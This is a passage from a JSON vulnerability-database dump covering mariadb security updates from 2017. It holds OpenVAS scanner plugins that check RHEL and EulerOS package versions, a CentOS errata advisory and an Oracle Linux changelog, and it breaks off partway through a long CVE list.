exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:05", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-3238", "CVE-2017-3244", "CVE-2017-3312", "CVE-2016-5617", "CVE-2016-6664", "CVE-2017-3265", "CVE-2017-3291", "CVE-2017-3317", "CVE-2017-3313", "CVE-2017-3302", "CVE-2017-3456", "CVE-2017-3309", "CVE-2017-3308", "CVE-2017-3243", "CVE-2017-3318", "CVE-2016-5483", "CVE-2017-3453", "CVE-2017-3464", "CVE-2017-3600", "CVE-2017-3258"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2017-08-04T00:00:00", "id": "OPENVAS:1361412562310871856", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871856", "type": "openvas", "title": "RedHat Update for mariadb RHSA-2017:2192-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_RHSA-2017_2192-01_mariadb.nasl 12497 2018-11-23 08:28:21Z cfischer $\n#\n# RedHat Update for mariadb RHSA-2017:2192-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871856\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-04 12:46:28 +0530 (Fri, 04 Aug 2017)\");\n script_cve_id(\"CVE-2016-5483\", \"CVE-2016-5617\", \"CVE-2016-6664\", \"CVE-2017-3238\",\n \"CVE-2017-3243\", \"CVE-2017-3244\", \"CVE-2017-3258\", \"CVE-2017-3265\",\n \"CVE-2017-3291\", \"CVE-2017-3302\", \"CVE-2017-3308\", \"CVE-2017-3309\",\n \"CVE-2017-3312\", \"CVE-2017-3313\", \"CVE-2017-3317\", \"CVE-2017-3318\",\n \"CVE-2017-3453\", \"CVE-2017-3456\", \"CVE-2017-3464\", \"CVE-2017-3600\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for mariadb RHSA-2017:2192-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mariadb'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"MariaDB is a multi-user, multi-threaded SQL\n database server that is binary compatible with MySQL. The following packages\n have been upgraded to a later upstream version: mariadb (5.5.56). (BZ#1458933)\n Security Fix(es): * It was discovered that the mysql and mysqldump tools did not\n correctly handle database and table names containing newline characters. A\n database user with privileges to create databases or tables could cause the\n mysql command to execute arbitrary shell or SQL commands while restoring\n database backup created using the mysqldump tool. (CVE-2016-5483, CVE-2017-3600)\n\n * A flaw was found in the way the mysqld_safe script handled creation of error\n log file. The mysql operating system user could use this flaw to escalate their\n privileges to root. (CVE-2016-5617, CVE-2016-6664) * Multiple flaws were found\n in the way the MySQL init script handled initialization of the database data\n directory and permission setting on the error log file. The mysql operating\n system user could use these flaws to escalate their privileges to root.\n (CVE-2017-3265) * It was discovered that the mysqld_safe script honored the\n ledir option value set in a MySQL configuration file. A user able to modify one\n of the MySQL configuration files could use this flaw to escalate their\n privileges to root. (CVE-2017-3291) * Multiple flaws were found in the way the\n mysqld_safe script handled creation of error log file. The mysql operating\n system user could use these flaws to escalate their privileges to root.\n (CVE-2017-3312) * A flaw was found in the way MySQL client library\n (libmysqlclient) handled prepared statements when server connection was lost. A\n malicious server or a man-in-the-middle attacker could possibly use this flaw to\n crash an application using libmysqlclient. (CVE-2017-3302) * This update fixes\n several vulnerabilities in the MariaDB database server. Information about these\n flaws can be found on the Oracle Critical Patch Update Advisory page, listed in\n the References section. (CVE-2017-3238, CVE-2017-3243, CVE-2017-3244,\n CVE-2017-3258, CVE-2017-3308, CVE-2017-3309, CVE-2017-3313, CVE-2017-3317,\n CVE-2017-3318, CVE-2017-3453, CVE-2017-3456, CVE-2017-3464) Additional Changes:\n For detailed information on changes in this release, see the Red Hat Enterprise\n Linux 7.4 Release Notes linked from the References section.\");\n script_tag(name:\"affected\", value:\"mariadb on Red Hat Enterprise Linux Server (v. 7)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2017:2192-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2017-August/msg00015.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_7\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"mariadb\", rpm:\"mariadb~5.5.56~2.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mariadb-bench\", rpm:\"mariadb-bench~5.5.56~2.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mariadb-debuginfo\", rpm:\"mariadb-debuginfo~5.5.56~2.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mariadb-devel\", rpm:\"mariadb-devel~5.5.56~2.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mariadb-libs\", rpm:\"mariadb-libs~5.5.56~2.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mariadb-server\", rpm:\"mariadb-server~5.5.56~2.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mariadb-test\", rpm:\"mariadb-test~5.5.56~2.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-27T18:33:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-3238", "CVE-2017-3244", "CVE-2017-3312", "CVE-2016-5617", "CVE-2016-6664", "CVE-2017-3265", "CVE-2017-3291", "CVE-2017-3317", "CVE-2017-3313", "CVE-2017-3302", "CVE-2017-3456", "CVE-2017-3309", "CVE-2017-3308", "CVE-2017-3243", "CVE-2017-3318", "CVE-2017-3651", "CVE-2016-5483", "CVE-2017-3453", "CVE-2017-3464", "CVE-2017-3600", "CVE-2017-3258"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220171170", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220171170", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for mariadb (EulerOS-SA-2017-1170)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2017.1170\");\n script_version(\"2020-01-23T10:55:11+0000\");\n script_cve_id(\"CVE-2016-5483\", \"CVE-2016-5617\", \"CVE-2016-6664\", \"CVE-2017-3238\", \"CVE-2017-3243\", \"CVE-2017-3244\", \"CVE-2017-3258\", \"CVE-2017-3265\", \"CVE-2017-3291\", \"CVE-2017-3302\", \"CVE-2017-3308\", \"CVE-2017-3309\", \"CVE-2017-3312\", \"CVE-2017-3313\", \"CVE-2017-3317\", \"CVE-2017-3318\", \"CVE-2017-3453\", \"CVE-2017-3456\", \"CVE-2017-3464\", \"CVE-2017-3600\", \"CVE-2017-3651\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 10:55:11 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 10:55:11 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for mariadb (EulerOS-SA-2017-1170)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP2\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2017-1170\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1170\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'mariadb' package(s) announced via the EulerOS-SA-2017-1170 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was discovered that the mysql and mysqldump tools did not correctly handle database and table names containing newline characters. A database user with privileges to create databases or tables could cause the mysql command to execute arbitrary shell or SQL commands while restoring database backup created using the mysqldump tool. (CVE-2016-5483, CVE-2017-3600)\n\nA flaw was found in the way the mysqld_safe script handled creation of error log file. The mysql operating system user could use this flaw to escalate their privileges to root. (CVE-2016-5617, CVE-2016-6664)\n\nMultiple flaws were found in the way the MySQL init script handled initialization of the database data directory and permission setting on the error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3265)\n\nIt was discovered that the mysqld_safe script honored the ledir option value set in a MySQL configuration file. A user able to modify one of the MySQL configuration files could use this flaw to escalate their privileges to root. (CVE-2017-3291)\n\nMultiple flaws were found in the way the mysqld_safe script handled creation of error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3312)\n\nA flaw was found in the way MySQL client library (libmysqlclient) handled prepared statements when server connection was lost. A malicious server or a man-in-the-middle attacker could possibly use this flaw to crash an application using libmysqlclient. (CVE-2017-3302)\n\nThis update fixes several vulnerabilities in the MariaDB database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section. (CVE-2017-3238, CVE-2017-3243, CVE-2017-3244, CVE-2017-3258, CVE-2017-3308, CVE-2017-3309, CVE-2017-3313, CVE-2017-3317, CVE-2017-3318, CVE-2017-3453, CVE-2017-3456, CVE-2017-3464)\");\n\n script_tag(name:\"affected\", value:\"'mariadb' package(s) on Huawei EulerOS V2.0SP2.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP2\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb\", rpm:\"mariadb~5.5.56~2\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-bench\", rpm:\"mariadb-bench~5.5.56~2\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-devel\", rpm:\"mariadb-devel~5.5.56~2\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-libs\", rpm:\"mariadb-libs~5.5.56~2\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-server\", rpm:\"mariadb-server~5.5.56~2\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-test\", rpm:\"mariadb-test~5.5.56~2\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-27T18:34:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-3238", "CVE-2017-3244", "CVE-2017-3312", "CVE-2016-5617", "CVE-2016-6664", "CVE-2017-3265", "CVE-2017-3291", "CVE-2017-3317", "CVE-2017-3313", "CVE-2017-3302", "CVE-2017-3456", "CVE-2017-3309", "CVE-2017-3308", "CVE-2017-3243", "CVE-2017-3318", "CVE-2017-3651", "CVE-2016-5483", "CVE-2017-3453", "CVE-2017-3464", "CVE-2017-3600", "CVE-2017-3258"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220171169", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220171169", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for mariadb (EulerOS-SA-2017-1169)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2017.1169\");\n script_version(\"2020-01-23T10:54:51+0000\");\n script_cve_id(\"CVE-2016-5483\", \"CVE-2016-5617\", \"CVE-2016-6664\", \"CVE-2017-3238\", \"CVE-2017-3243\", \"CVE-2017-3244\", \"CVE-2017-3258\", \"CVE-2017-3265\", \"CVE-2017-3291\", \"CVE-2017-3302\", \"CVE-2017-3308\", \"CVE-2017-3309\", \"CVE-2017-3312\", \"CVE-2017-3313\", \"CVE-2017-3317\", \"CVE-2017-3318\", \"CVE-2017-3453\", \"CVE-2017-3456\", \"CVE-2017-3464\", \"CVE-2017-3600\", \"CVE-2017-3651\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 10:54:51 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 10:54:51 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for mariadb (EulerOS-SA-2017-1169)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP1\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2017-1169\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1169\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'mariadb' package(s) announced via the EulerOS-SA-2017-1169 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was discovered that the mysql and mysqldump tools did not correctly handle database and table names containing newline characters. A database user with privileges to create databases or tables could cause the mysql command to execute arbitrary shell or SQL commands while restoring database backup created using the mysqldump tool. (CVE-2016-5483, CVE-2017-3600)\n\nA flaw was found in the way the mysqld_safe script handled creation of error log file. The mysql operating system user could use this flaw to escalate their privileges to root. (CVE-2016-5617, CVE-2016-6664)\n\nMultiple flaws were found in the way the MySQL init script handled initialization of the database data directory and permission setting on the error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3265)\n\nIt was discovered that the mysqld_safe script honored the ledir option value set in a MySQL configuration file. A user able to modify one of the MySQL configuration files could use this flaw to escalate their privileges to root. (CVE-2017-3291)\n\nMultiple flaws were found in the way the mysqld_safe script handled creation of error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3312)\n\nA flaw was found in the way MySQL client library (libmysqlclient) handled prepared statements when server connection was lost. A malicious server or a man-in-the-middle attacker could possibly use this flaw to crash an application using libmysqlclient. (CVE-2017-3302)\n\nThis update fixes several vulnerabilities in the MariaDB database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section. (CVE-2017-3238, CVE-2017-3243, CVE-2017-3244, CVE-2017-3258, CVE-2017-3308, CVE-2017-3309, CVE-2017-3313, CVE-2017-3317, CVE-2017-3318, CVE-2017-3453, CVE-2017-3456, CVE-2017-3464)\");\n\n script_tag(name:\"affected\", value:\"'mariadb' package(s) on Huawei EulerOS V2.0SP1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb\", rpm:\"mariadb~5.5.56~2\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-bench\", rpm:\"mariadb-bench~5.5.56~2\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-devel\", rpm:\"mariadb-devel~5.5.56~2\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-embedded\", rpm:\"mariadb-embedded~5.5.56~2\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-libs\", rpm:\"mariadb-libs~5.5.56~2\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-server\", rpm:\"mariadb-server~5.5.56~2\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-test\", rpm:\"mariadb-test~5.5.56~2\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2019-12-20T18:24:30", "bulletinFamily": "unix", "cvelist": ["CVE-2017-3238", "CVE-2017-3244", "CVE-2017-3312", "CVE-2016-5617", "CVE-2016-6664", "CVE-2017-3265", "CVE-2017-3291", "CVE-2017-3317", "CVE-2017-3313", "CVE-2017-3302", "CVE-2017-3456", "CVE-2017-3309", "CVE-2017-3308", "CVE-2017-3243", "CVE-2017-3318", "CVE-2017-3651", "CVE-2016-5483", "CVE-2017-3453", "CVE-2017-3464", "CVE-2017-3600", "CVE-2017-3258"], "description": "**CentOS Errata and Security Advisory** CESA-2017:2192\n\n\nMariaDB is a multi-user, multi-threaded SQL database server that is binary compatible with MySQL.\n\nThe following packages have been upgraded to a later upstream version: mariadb (5.5.56). (BZ#1458933)\n\nSecurity Fix(es):\n\n* It was discovered that the mysql and mysqldump tools did not correctly handle database and table names containing newline characters. A database user with privileges to create databases or tables could cause the mysql command to execute arbitrary shell or SQL commands while restoring database backup created using the mysqldump tool. (CVE-2016-5483, CVE-2017-3600)\n\n* A flaw was found in the way the mysqld_safe script handled creation of error log file. The mysql operating system user could use this flaw to escalate their privileges to root. (CVE-2016-5617, CVE-2016-6664)\n\n* Multiple flaws were found in the way the MySQL init script handled initialization of the database data directory and permission setting on the error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3265)\n\n* It was discovered that the mysqld_safe script honored the ledir option value set in a MySQL configuration file. A user able to modify one of the MySQL configuration files could use this flaw to escalate their privileges to root. (CVE-2017-3291)\n\n* Multiple flaws were found in the way the mysqld_safe script handled creation of error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3312)\n\n* A flaw was found in the way MySQL client library (libmysqlclient) handled prepared statements when server connection was lost. A malicious server or a man-in-the-middle attacker could possibly use this flaw to crash an application using libmysqlclient. (CVE-2017-3302)\n\n* This update fixes several vulnerabilities in the MariaDB database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section. (CVE-2017-3238, CVE-2017-3243, CVE-2017-3244, CVE-2017-3258, CVE-2017-3308, CVE-2017-3309, CVE-2017-3313, CVE-2017-3317, CVE-2017-3318, CVE-2017-3453, CVE-2017-3456, CVE-2017-3464)\n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat Enterprise Linux 7.4 Release Notes linked from the References section.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-cr-announce/2017-August/004369.html\n\n**Affected packages:**\nmariadb\nmariadb-bench\nmariadb-devel\nmariadb-embedded\nmariadb-embedded-devel\nmariadb-libs\nmariadb-server\nmariadb-test\n\n**Upstream details at:**\n", "edition": 5, "modified": "2017-08-24T01:39:47", "published": "2017-08-24T01:39:47", "href": "http://lists.centos.org/pipermail/centos-cr-announce/2017-August/004369.html", "id": "CESA-2017:2192", "title": "mariadb security update", "type": "centos", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2020-10-22T17:03:53", "bulletinFamily": "unix", "cvelist": ["CVE-2017-3238", "CVE-2017-3244", "CVE-2017-3312", "CVE-2016-5617", "CVE-2016-6664", "CVE-2017-3265", "CVE-2017-3291", "CVE-2017-3317", "CVE-2017-3313", "CVE-2017-3302", "CVE-2017-3456", "CVE-2016-6662", "CVE-2017-3309", "CVE-2017-3308", "CVE-2017-3243", "CVE-2017-3318", "CVE-2017-3651", "CVE-2016-5483", "CVE-2017-3453", "CVE-2017-3464", "CVE-2017-3600", "CVE-2017-3258"], "description": "[1:5.5.56-2]\n- Do not fix context and change owner if run by root in mariadb-prepare-db-dir\n Related: #1458940\n- Check properly that datadir includes only expected files\n Related: #1356897\n[1:5.5.56-1]\n- Rebase to 5.5.56\n That release also fixes the following security issues:\n CVE-2016-5617/CVE-2016-6664 CVE-2017-3312 CVE-2017-3238 CVE-2017-3243\n CVE-2017-3244 CVE-2017-3258 CVE-2017-3313 CVE-2017-3317 CVE-2017-3318\n CVE-2017-3291 CVE-2017-3302 CVE-2016-5483/CVE-2017-3600 CVE-2017-3308\n CVE-2017-3309 CVE-2017-3453 CVE-2017-3456 CVE-2017-3464\n Resolves: #1458933\n New deps required by upstream: checkpolicy and policycoreutils-python\n License text removed by upstream: COPYING.LESSER\n Do not ignore test-suite failure\n Downstream script mariadb-prepare-db-dir fixed for CVE-2017-3265\n Resolves: #1458940\n[5.5.52-2]\n- Extension of mariadb-prepare-db-dir script\n- Resolves: #1356897\n- Rebase to 5.5.52, that also include fix for CVE-2016-6662\n Resolves: #1377974", "edition": 5, "modified": "2017-08-07T00:00:00", "published": "2017-08-07T00:00:00", "id": "ELSA-2017-2192", "href": "http://linux.oracle.com/errata/ELSA-2017-2192.html", "title": "mariadb security and bug fix update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "oracle": [{"lastseen": "2019-05-29T18:20:59", "bulletinFamily": "software", "cvelist": ["CVE-2016-5606", "CVE-2016-5540", "CVE-2016-5630", "CVE-2016-5594", "CVE-2016-5575", "CVE-2016-5609", "CVE-2015-5351", "CVE-2016-8294", "CVE-2016-5565", "CVE-2016-5591", "CVE-2015-1792", "CVE-2016-5498", "CVE-2016-5624", "CVE-2016-5555", "CVE-2014-9296", "CVE-2015-0235", "CVE-2015-1793", "CVE-2016-1546", "CVE-2016-5560", "CVE-2016-5611", "CVE-2014-7809", "CVE-2016-3492", "CVE-2016-5612", "CVE-2015-3197", "CVE-2016-5602", "CVE-2016-5487", "CVE-2016-5505", "CVE-2016-5608", "CVE-2016-5625", "CVE-2016-6306", "CVE-2016-5619", "CVE-2016-5568", "CVE-2016-6663", "CVE-2015-1789", "CVE-2016-5527", "CVE-2016-2183", "CVE-2014-0227", "CVE-2016-5481", "CVE-2016-5518", "CVE-2016-8281", "CVE-2016-5631", "CVE-2015-0286", "CVE-2016-2178", "CVE-2016-8288", "CVE-2016-5635", "CVE-2016-5497", "CVE-2015-2568", "CVE-2016-5486", "CVE-2016-5628", "CVE-2015-3195", "CVE-2016-4979", "CVE-2016-5617", "CVE-2016-5621", "CVE-2016-3473", "CVE-2016-5521", "CVE-2016-5543", "CVE-2016-5585", "CVE-2016-5488", "CVE-2016-0714", "CVE-2014-3571", "CVE-2016-8292", "CVE-2016-5588", "CVE-2016-5559", "CVE-2016-5599", "CVE-2016-5539", "CVE-2016-5514", "CVE-2016-5479", "CVE-2016-6302", "CVE-2016-5504", "CVE-2016-6664", "CVE-2016-3551", "CVE-2016-5499", "CVE-2016-2177", "CVE-2016-5604", "CVE-2016-5574", "CVE-2014-9294", "CVE-2010-5312", "CVE-2014-0224", "CVE-2016-5616", "CVE-2016-8296", "CVE-2016-0635", "CVE-2016-2105", "CVE-2016-5557", "CVE-2016-5569", "CVE-2016-2107", "CVE-2016-5553", "CVE-2015-7501", "CVE-2016-5610", "CVE-2016-5577", "CVE-2015-3253", "CVE-2014-9295", "CVE-2016-6307", "CVE-2016-3562", "CVE-2016-1182", "CVE-2016-5566", "CVE-2016-5576", "CVE-2016-5582", "CVE-2016-0763", "CVE-2016-5493", "CVE-2016-5615", "CVE-2016-8285", "CVE-2016-6308", "CVE-2016-5633", "CVE-2016-2180", "CVE-2016-5534", "CVE-2016-5542", "CVE-2016-5513", "CVE-2016-5571", "CVE-2016-5567", "CVE-2016-5597", "CVE-2016-5525", "CVE-2016-8295", "CVE-2014-0099", "CVE-2016-5627", "CVE-2014-2532", "CVE-2016-5500", "CVE-2016-8287", "CVE-2016-2109", "CVE-2016-3505", "CVE-2016-2181", "CVE-2014-0119", "CVE-2016-6304", "CVE-2016-5482", "CVE-2016-5522", "CVE-2014-0114", "CVE-2016-5529", "CVE-2013-4322", "CVE-2016-5515", "CVE-2016-6662", "CVE-2014-0050", "CVE-2016-5595", "CVE-2013-2067", "CVE-2015-0500", "CVE-2016-5596", "CVE-2013-4286", "CVE-2016-1881", "CVE-2015-0382", "CVE-2099-1234", "CVE-2016-5587", "CVE-2016-5480", "CVE-2016-5600", "CVE-2016-5491", "CVE-2016-5586", "CVE-2016-5519", "CVE-2016-5605", "CVE-2015-1788", "CVE-2016-5632", "CVE-2016-5511", "CVE-2016-5578", "CVE-2016-5562", "CVE-2016-5489", "CVE-2016-7052", "CVE-2016-5490", "CVE-2016-5533", 